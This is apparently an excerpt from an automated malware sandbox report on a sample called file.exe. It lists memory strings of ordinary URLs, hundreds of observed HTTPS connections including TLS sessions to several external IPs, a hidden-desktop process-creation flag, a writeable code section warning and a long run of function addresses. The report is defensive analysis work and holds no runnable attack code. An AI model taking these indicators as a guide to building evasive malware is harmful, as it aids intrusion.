Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.office.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.tiktok.com/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://www.youtube.com
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.25.228:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.8:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.181.0:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49833 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041FEA7 CreateDesktopA,memset,memset,CreateProcessA,

0_2_0041FEA7

System Summary

PE file has a writeable .text section

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C8E6	0_2_0043C8E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C071	0_2_0040C071
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D001	0_2_0040D001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407001	0_2_00407001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409001	0_2_00409001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C001	0_2_0043C001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A011	0_2_0040A011
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043D011	0_2_0043D011
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404031	0_2_00404031
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426031	0_2_00426031
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004060F1	0_2_004060F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004070F1	0_2_004070F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A0F1	0_2_0040A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C0F1	0_2_0043C0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043D0F1	0_2_0043D0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042A0F1	0_2_0042A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405081	0_2_00405081
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408091	0_2_00408091
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041E0A1	0_2_0041E0A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408151	0_2_00408151
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409171	0_2_00409171
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F111	0_2_0040F111
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C111	0_2_0040C111
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404111	0_2_00404111
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004281C1	0_2_004281C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004061D1	0_2_004061D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041D1E1	0_2_0041D1E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004081F1	0_2_004081F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041E181	0_2_0041E181
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A191	0_2_0040A191
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C191	0_2_0043C191
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004041B1	0_2_004041B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C241	0_2_0040C241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409241	0_2_00409241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0044025F	0_2_0044025F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404261	0_2_00404261
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406271	0_2_00406271
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407211	0_2_00407211
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B21F	0_2_0043B21F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C221	0_2_0043C221
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C2C1	0_2_0043C2C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B2F1	0_2_0043B2F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405281	0_2_00405281
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A281	0_2_0040A281
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041E291	0_2_0041E291
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004072A1	0_2_004072A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004202B1	0_2_004202B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407341	0_2_00407341
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A351	0_2_0040A351
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041E371	0_2_0041E371
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A371	0_2_0043A371
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409301	0_2_00409301
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C311	0_2_0040C311
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00425320	0_2_00425320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004283C1	0_2_004283C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004093D1	0_2_004093D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004073E1	0_2_004073E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B3E1	0_2_0043B3E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404381	0_2_00404381
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408381	0_2_00408381
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D3B1	0_2_0040D3B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405461	0_2_00405461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406461	0_2_00406461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A461	0_2_0040A461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D471	0_2_0040D471
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A471	0_2_0043A471
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C401	0_2_0040C401
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F401	0_2_0040F401
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408431	0_2_00408431
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004044D1	0_2_004044D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004064F1	0_2_004064F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C4A1	0_2_0040C4A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004094A1	0_2_004094A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B4B1	0_2_0043B4B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C4B1	0_2_0043C4B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A551	0_2_0040A551
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C551	0_2_0043C551
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A561	0_2_0043A561
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408501	0_2_00408501
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407501	0_2_00407501
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00428501	0_2_00428501
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D521	0_2_0040D521
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D5C1	0_2_0040D5C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004055C1	0_2_004055C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E5C1	0_2_0040E5C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004085D1	0_2_004085D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C5F1	0_2_0043C5F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B591	0_2_0040B591
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409591	0_2_00409591
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404591	0_2_00404591
